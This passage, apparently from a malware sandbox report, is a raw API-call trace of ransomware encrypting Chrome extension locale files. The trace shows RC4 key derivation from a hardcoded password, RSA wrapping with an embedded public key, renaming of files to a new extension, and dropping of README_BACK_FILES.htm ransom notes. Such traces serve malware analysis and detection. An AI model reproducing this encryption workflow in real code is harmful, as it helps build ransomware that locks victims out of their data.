(lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.087] CryptHashData (hHash=0x2938978, pbData=0x28cb300, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.087] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29378b8) returned 1 [0249.087] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.087] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.087] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293dde8) returned 1 [0249.087] CryptImportPublicKeyInfo (in: hCryptProv=0x293dde8, dwCertEncodingType=0x1, pInfo=0x2931dd0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2931e00*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2931e08*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937578) returned 1 [0249.087] CryptEncrypt (in: hKey=0x2937578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.088] CryptEncrypt (in: hKey=0x2937578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293eee8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293eee8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.088] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293eee8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293eee8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.089] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd1, lpOverlapped=0x0) returned 1 [0249.090] CryptEncrypt (in: hKey=0x29378b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd1, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.090] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.090] CloseHandle (hObject=0x5d58) returned 1 [0249.090] CloseHandle (hObject=0x5d5c) returned 1 [0249.090] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json"), bFailIfExists=0) returned 1 [0249.094] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json", dwFileAttributes=0x0) returned 1 [0249.094] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json.gsg")) returned 1 [0249.095] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\messages.json.fuck")) returned 1 [0249.097] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.097] CryptDestroyKey (hKey=0x29378b8) returned 1 [0249.097] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.097] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.097] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.097] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\readme_back_files.htm")) returned 0xffffffff [0249.097] AreFileApisANSI () returned 1 [0249.097] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0249.097] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_US\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\en_us\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.098] GetFileType (hFile=0x5d54) returned 0x1 [0249.098] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.099] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.099] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.100] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.100] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.100] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.100] GetLastError () returned 0x0 [0249.100] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json")) returned 0x20 [0249.101] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json", dwFileAttributes=0x80) returned 1 [0249.101] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.102] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.105] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.105] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.107] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.107] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.107] CryptHashData (hHash=0x2938978, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.107] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937538) returned 1 [0249.107] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.107] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.107] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293e448) returned 1 [0249.108] CryptImportPublicKeyInfo (in: hCryptProv=0x293e448, dwCertEncodingType=0x1, pInfo=0x2931ea0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2931ed0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2931ed8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937838) returned 1 [0249.108] CryptEncrypt (in: hKey=0x2937838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.108] CryptEncrypt (in: hKey=0x2937838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293e118*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293e118*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.108] WriteFile (in: hFile=0x5d58, lpBuffer=0x293e118*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293e118*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.109] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xce, lpOverlapped=0x0) returned 1 [0249.110] CryptEncrypt (in: hKey=0x2937538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xce, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0249.110] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0249.110] CloseHandle (hObject=0x5d5c) returned 1 [0249.110] CloseHandle (hObject=0x5d58) returned 1 [0249.110] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json"), bFailIfExists=0) returned 1 [0249.112] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json", dwFileAttributes=0x0) returned 1 [0249.113] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.gsg")) returned 1 [0249.114] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\messages.json.fuck")) returned 1 [0249.114] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.114] CryptDestroyKey (hKey=0x2937538) returned 1 [0249.114] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.115] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.115] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.115] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\readme_back_files.htm")) returned 0xffffffff [0249.115] AreFileApisANSI () returned 1 [0249.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.115] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.116] GetFileType (hFile=0x5d54) returned 0x1 [0249.116] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.117] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.117] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.117] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.117] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.117] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.117] GetLastError () returned 0x0 [0249.117] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json")) returned 0x20 [0249.118] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json", dwFileAttributes=0x80) returned 1 [0249.118] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.119] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.119] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.120] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.121] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.121] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.121] CryptHashData (hHash=0x2938978, pbData=0x28cb648, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.121] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937538) returned 1 [0249.122] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.122] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.122] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293e3c0) returned 1 [0249.122] CryptImportPublicKeyInfo (in: hCryptProv=0x293e3c0, dwCertEncodingType=0x1, pInfo=0x29308b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29308e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29308e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937438) returned 1 [0249.122] CryptEncrypt (in: hKey=0x2937438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.122] CryptEncrypt (in: hKey=0x2937438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293eaa8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293eaa8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.122] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293eaa8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293eaa8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.123] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xce, lpOverlapped=0x0) returned 1 [0249.124] CryptEncrypt (in: hKey=0x2937538, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xce, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0249.124] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0249.124] CloseHandle (hObject=0x5d58) returned 1 [0249.124] CloseHandle (hObject=0x5d5c) returned 1 [0249.124] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json"), bFailIfExists=0) returned 1 [0249.127] SetFileAttributesA 